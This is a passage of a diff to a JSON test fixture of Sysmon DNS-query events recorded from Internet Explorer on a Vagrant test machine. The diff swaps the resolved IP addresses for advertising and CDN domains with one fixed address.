fp4.ads.stickyadstv.com.akadns.net;::ffff:38.134.110.101;::ffff:38.134.110.143;::ffff:38.134.110.141;::ffff:38.134.110.171;::ffff:38.134.110.177;::ffff:38.134.110.115;::ffff:38.134.110.104;::ffff:38.134.110.114;", + "QueryResults": "type: 5 ip1.ads.stickyadstv.com.akadns.net;type: 5 wlb1.ads.stickyadstv.com.akadns.net;type: 5 fp4.ads.stickyadstv.com.akadns.net;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:04.860", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", @@ -5817,7 +5817,7 @@ "event": { "kind": "event", "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:06.051692700Z'/\u003e\u003cEventRecordID\u003e165\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.904\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ehbx.media.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 hbx.media.net.edgekey.net;type: 5 e607.d.akamaiedge.net;::ffff:23.52.167.93;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:06.051692700Z'/\u003e\u003cEventRecordID\u003e165\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.904\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ehbx.media.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 hbx.media.net.edgekey.net;type: 5 e607.d.akamaiedge.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22" }, "winlog": { @@ -5830,7 +5830,7 @@ "version": 5, "time_created": "2019-07-18T03:34:06.051Z", "event_data": { - "QueryResults": "type: 5 hbx.media.net.edgekey.net;type: 5 e607.d.akamaiedge.net;::ffff:23.52.167.93;", + "QueryResults": "type: 5 hbx.media.net.edgekey.net;type: 5 e607.d.akamaiedge.net;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:04.904", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}", @@ -5858,7 +5858,7 @@ }, "event": { "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:06.051710000Z'/\u003e\u003cEventRecordID\u003e166\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.911\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ematch.taboola.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 trc.taboola.map.fastly.net;::ffff:151.101.194.49;::ffff:151.101.2.49;::ffff:151.101.66.49;::ffff:151.101.130.49;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:06.051710000Z'/\u003e\u003cEventRecordID\u003e166\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:04.911\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003ematch.taboola.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 trc.taboola.map.fastly.net;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event" }, @@ -5876,7 +5876,7 @@ "ProcessId": "2736", "QueryName": "match.taboola.com", "QueryStatus": "0", - "QueryResults": "type: 5 trc.taboola.map.fastly.net;::ffff:151.101.194.49;::ffff:151.101.2.49;::ffff:151.101.66.49;::ffff:151.101.130.49;", + "QueryResults": "type: 5 trc.taboola.map.fastly.net;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe" }, "process": { @@ -5919,7 +5919,7 @@ "ProcessId": "2736", "QueryName": "img-s-msn-com.akamaized.net", "QueryStatus": "0", - "QueryResults": "type: 5 a1834.dspg2.akamai.net;::ffff:23.50.53.185;::ffff:23.50.53.194;", + "QueryResults": "type: 5 a1834.dspg2.akamai.net;::ffff:89.160.20.156;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:06.056" }, @@ -5929,7 +5929,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:06.051902900Z'/\u003e\u003cEventRecordID\u003e167\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:06.056\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eimg-s-msn-com.akamaized.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 a1834.dspg2.akamai.net;::ffff:23.50.53.185;::ffff:23.50.53.194;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:06.051902900Z'/\u003e\u003cEventRecordID\u003e167\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:06.056\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eimg-s-msn-com.akamaized.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 a1834.dspg2.akamai.net;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "code": "22", "kind": "event" @@ -5953,7 +5953,7 @@ "ProcessId": "2736", "QueryName": "static-entertainment-eus-s-msn-com.akamaized.net", "QueryStatus": "0", - "QueryResults": "type: 5 a1505.g2.akamai.net;::ffff:23.50.53.194;::ffff:23.50.53.186;", + "QueryResults": "type: 5 a1505.g2.akamai.net;::ffff:89.160.20.156;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:06.064" }, @@ -5974,7 +5974,7 @@ "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:07.049319700Z'/\u003e\u003cEventRecordID\u003e168\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:06.064\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003estatic-entertainment-eus-s-msn-com.akamaized.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 a1505.g2.akamai.net;::ffff:23.50.53.194;::ffff:23.50.53.186;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:07.049319700Z'/\u003e\u003cEventRecordID\u003e168\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:06.064\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003estatic-entertainment-eus-s-msn-com.akamaized.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 a1505.g2.akamai.net;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" } }, { @@ -5983,7 +5983,7 @@ "code": "22", "kind": "event", "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:07.049334900Z'/\u003e\u003cEventRecordID\u003e169\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:06.178\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eradarmaps.weather.microsoft.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 radarmaps.weather.microsoft.com.edgekey.net;type: 5 e15275.g.akamaiedge.net;::ffff:23.217.149.91;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:07.049334900Z'/\u003e\u003cEventRecordID\u003e169\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:06.178\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003eradarmaps.weather.microsoft.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 radarmaps.weather.microsoft.com.edgekey.net;type: 5 e15275.g.akamaiedge.net;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e" }, "winlog": { "event_id": "22", @@ -6006,7 +6006,7 @@ "ProcessId": "2736", "QueryName": "radarmaps.weather.microsoft.com", "QueryStatus": "0", - "QueryResults": "type: 5 radarmaps.weather.microsoft.com.edgekey.net;type: 5 e15275.g.akamaiedge.net;::ffff:23.217.149.91;" + "QueryResults": "type: 5 radarmaps.weather.microsoft.com.edgekey.net;type: 5 e15275.g.akamaiedge.net;::ffff:89.160.20.156;" }, "process": { "thread": { @@ -6026,7 +6026,7 @@ }, "event": { "provider": "Microsoft-Windows-Sysmon", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:07.049349000Z'/\u003e\u003cEventRecordID\u003e170\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:06.455\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a8-5d2f-0000-001094619900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e356\u003c/Data\u003e\u003cData Name='QueryName'\u003estatic-entertainment-eus-s-msn-com.akamaized.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 a1505.g2.akamai.net;::ffff:23.50.53.194;::ffff:23.50.53.186;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:07.049349000Z'/\u003e\u003cEventRecordID\u003e170\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:06.455\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a8-5d2f-0000-001094619900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e356\u003c/Data\u003e\u003cData Name='QueryName'\u003estatic-entertainment-eus-s-msn-com.akamaized.net\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 a1505.g2.akamai.net;::ffff:89.160.20.156;::ffff:89.160.20.156;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "code": "22", "kind": "event" }, @@ -6049,7 +6049,7 @@ "ProcessId": "356", "QueryName": "static-entertainment-eus-s-msn-com.akamaized.net", "QueryStatus": "0", - "QueryResults": "type: 5 a1505.g2.akamai.net;::ffff:23.50.53.194;::ffff:23.50.53.186;", + "QueryResults": "type: 5 a1505.g2.akamai.net;::ffff:89.160.20.156;::ffff:89.160.20.156;", "Image": "C:\\Program Files\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:06.455" }, @@ -6081,7 +6081,7 @@ "ProcessId": "2736", "QueryName": "tag.sp.advertising.com", "QueryStatus": "0", - "QueryResults": "type: 5 cs747173190.wac.omegacdn.net;::ffff:152.195.32.163;", + "QueryResults": "type: 5 cs747173190.wac.omegacdn.net;::ffff:89.160.20.156;", "Image": "C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "UtcTime": "2019-07-18 03:34:06.494", "ProcessGuid": "{fa4a0de6-e8a9-5d2f-0000-001053699900}" @@ -6097,7 +6097,7 @@ "level": "information" }, "event": { - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:07.049364200Z'/\u003e\u003cEventRecordID\u003e171\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:06.494\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etag.sp.advertising.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 cs747173190.wac.omegacdn.net;::ffff:152.195.32.163;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:34:07.049364200Z'/\u003e\u003cEventRecordID\u003e171\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:34:06.494\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a9-5d2f-0000-001053699900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2736\u003c/Data\u003e\u003cData Name='QueryName'\u003etag.sp.advertising.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 